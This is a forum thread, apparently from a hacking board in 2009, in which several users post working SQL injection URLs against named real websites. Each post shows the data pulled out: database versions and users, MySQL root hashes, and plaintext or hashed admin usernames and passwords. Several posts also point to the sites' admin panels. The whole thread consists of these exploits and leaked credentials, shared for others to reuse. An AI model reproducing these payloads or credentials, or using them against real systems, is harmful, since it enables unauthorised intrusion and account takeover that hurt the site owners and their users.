SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    Code:
    http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version (),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    Database Version : 5.0.51a-3ubuntu5.4
    Database name : cel_mag
    User name : root@localhost


    Grabbing the admin:

    Code:
    http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a ,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+limit+0,1--
    root:*BB9DD2A2E45245A1F1F7218330AD4AC2551D1498

    Admin panel:

    Code:
    http://www.cellulare-magazine.it/ admin/
     
    #7781 f1ng3r, 15 Feb 2009
    Last edited: 15 Feb 2009
  2. kevmen

    Guessed it
     
    #7782 kevmen, 15 Feb 2009
    Last edited: 15 Feb 2009
    1 person likes this.
  3. Gorev

    http://www.portaldeasigurari.ro/stiriint.php?ann=2006&lunaa=-2+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8--




    Database Version: 5.0.51a-community
    Database name: romasigr_portal
    User name: romasigr_puser@localhost
     
  4. SVAROG

    http://www.huntearth.com/searchsection.php?sc=-1+union+select+version()/*&s=Fishing%20Lodge&

    Database Version:4.1.22-standard
     
  5. Gorev

    http://www.aparaturafiscala.ro/noutate.php?id=-12+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9




    Version : 4.1.22-log
    Database : aparaturafiscala_db
    User : aparaturafiscala@localhost
     
  6. f1ng3r

    Code:
    http://cleanenergycouncil.org.au/news/showarticle.php?id=-1+union+select+1,concat _ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11--
    Database Version : 5.0.48
    Database name :cleanene_website
    User name : cleanene_website@localhost
     
  7. -m0rgan-

    Code:
    http://tristihii.ru/news-view.php?ID=-1+union+select+1,2,3,4,group_concat(concat(username,0x3a,password))+from+ADM_USERS--
    logins/passwords:
    Code:
    FIDUKOFF:lutic,SHISHKOV:lexa,ULA:shish,ADMIN:tristihii
    -----------------------------------------------------------
    Code:
    http://kolyada-theatre.ur.ru/history.php?ID=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,10,11,12+from+kol_users--
    login/password:
    Code:
    admin:b0ac5c667f75a17da9b1ff11a1c59f6b
    --------------------------------------------------------------
    Code:
    http://www.e30club.ru/index.php?id=-116+union+select+1,concat(login,0x3a,password),3,4,5,6,7+from+ds_bmwstyle_users
    login/password:
    Code:
    Newsmaker:newstyle
    ----------------------------------------------------------------
    Code:
    http://www.aquamaxservice.kiev.ua/articl.php?id=-6+union+select+1,2,3,concat(adm,0x3a,pass),5,6,7+from+admin--
    login/password:
    Code:
    admin:Mjuehuh379
    -----------------------------------------------------------------
    The End!
     
  8. Gorev

    http://www.graphicart.ro/graphic_art-COM-945GSE,_noul_Module_CPU_COM_Express_cu_procesorul_Atom_N270_de_la_Intel-12+AND+ASCII(SUBSTRING((select+concat_ws(0x3a,version(),database(),user())%20),26,1))=44.html



    Version : 5.0.18-log
    Database : graphicartro_gadb
    User : [email protected]
     
  9. f1ng3r

    Code:
    http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a ,version(),database(),user()),5,6,7,8,9,10,11,12--
    Database Version : 5.1.22-rc
    Database name : STPSB
    User name : stpsb@localhost


    admins and sysadmins:

    Code:
    http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a,email ,password),5,6,7,8,9,10,11,12+from+users+limit+0,1--
    Admin panel:

    Code:
    http://www.stpsb.org/ admin/
    login is by e-mail
     
  10. -m0rgan-

    Code:
    http://top.frontmen.ru/kom.php?id=-1+union+select+1,concat(login,0x3a,password),3,4,5,6+from+users--
    -------------------------------------------------------------
    The End!
     
  11. zifanchuck

    ТТ Финансы

    TIC: 200
    PR: 5

    Database Version: 5.0.67-log
    Database name: u24363
    User name: [email protected]

    -----------------------------------------------------------------------------------------
    Российское Исламское Наследие

    TIC: 90
    PR: 4

    Database Version: 5.0.67-log
    Database name: u24570_1
    User name: [email protected]

    ------------------------------------------------------------------------------------------
     
    #7791 zifanchuck, 15 Feb 2009
    Last edited by a moderator: 16 Feb 2009
  12. f1ng3r

    Code:
    http://www.26000gezichten.nl/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,13,14,15--
    Database Version : 4.0.24_Debian-10sarge2-log
    Database name : 26000gezichten
    User name : 26000gezichten@localhost
     
  13. sabe

    Food

    Wcer.wisc.edu - pr7
    Unlv.edu - pr7
    http://www.unlv.edu/cgiwrap/webcgi/photogallery/index.php?cat_id=-15'+union+select+unhex(hex(version())),2/*&action=images
     
    #7793 sabe, 16 Feb 2009
    Last edited: 16 Feb 2009
    3 people like this.
  14. spherics

    Database Version: 4.0.23_Debian-3ubuntu2.4-log
    Database name: wizkit
    User name: peter@localhost


    root : 5ace410270df76e6


    PageRank = 6

    Database Version: 4.1.20-log
    Database name: cmmweb
    User name: cmmusr@mysql-cluster
     
    2 people like this.
  15. Assembler

    Code:
    http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,id,nick,pass,name),8,9%20from%20bazylika_admins-- 
    (Admin credentials)
    Code:
    http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,table_name,8,9%20from%20information_schema.tables-- 
    (All tables)
    Code:
    http://www.jezuici.pl/bazylika/index/admin.php 
    (Admin panel)

    nick: pass: name
    PauluSJ: 18KVL08: Administrator

    There are a few more admin panels; whoever needs them will, I think, dig them up themselves.
     
    1 person likes this.
  16. -m0rgan-

    Shop...
    PR:4
    Code:
    http://linz-shopping.ru/linz-type.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(concat(login,0x3a,password)),13+from+kernel_users--
    login/password:
    Code:
    root:roMdKE/jr382Q
    Code:
    pavel:pa6MMGOsPbNlE
    Code:
    linz:liXrWmY5KaAxI
    --------------------------------------------------------
    PR:2
    TIC:80
    Code:
    http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9--
    user/version/database:
    ----------------------------------------------------
    The End!
     
    #7796 -m0rgan-, 16 Feb 2009
    Last edited by a moderator: 16 Feb 2009
  17. [JavaScript]

    Institute website
    Code:
    http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5,6,7,8,9/*
    user:database:version
    Y1V0_4d31n@localhost:yivo_production:4.1.9-nt

    Code:
    http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6,7,8,9+from+mysql.user/*
    user : password (MySQL)
    root:682a23ee48abb657


    Code:
    http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9+from+users+limit+0,1/*
    Users:
    Code:
    multimerge:mm4eva
    hello:password
    author1:password
    yivo:mm4yivo
     
    #7797 [JavaScript], 16 Feb 2009
    Last edited: 16 Feb 2009
  18. Gorev

    Girls....

    http://www.escorts-romania.net/en_articles.php?sid=-3+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12




    Database Version: 4.1.25-Debian_mt1
    Database name: db24939_escorts
    User name: [email protected]
     
  19. Assembler

    Code:
    http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables-- 
    (Tables)

    Code:
    http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,concat_ws(0x3a,adm_name,adm_login,adm_password)%20,3,4,5,6,7%20from%20insity_adm-- 
    (Admin credentials)

    adm_name
    ,adm_login,adm_password

    Andrew
    :incityadmin:incityadmin

    Couldn't find the admin panel.. =(
     
    1 person likes this.
  20. yarbabin

    summitmediapartners.com

    Code:
    http://www.summitmediapartners.com/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-community

    tables: gl_users
    columns: username, passwd

    Admin panel:
    Code:
    http://www.summitmediapartners.com/admin/moderation.php
     
    _________________________
    2 people like this.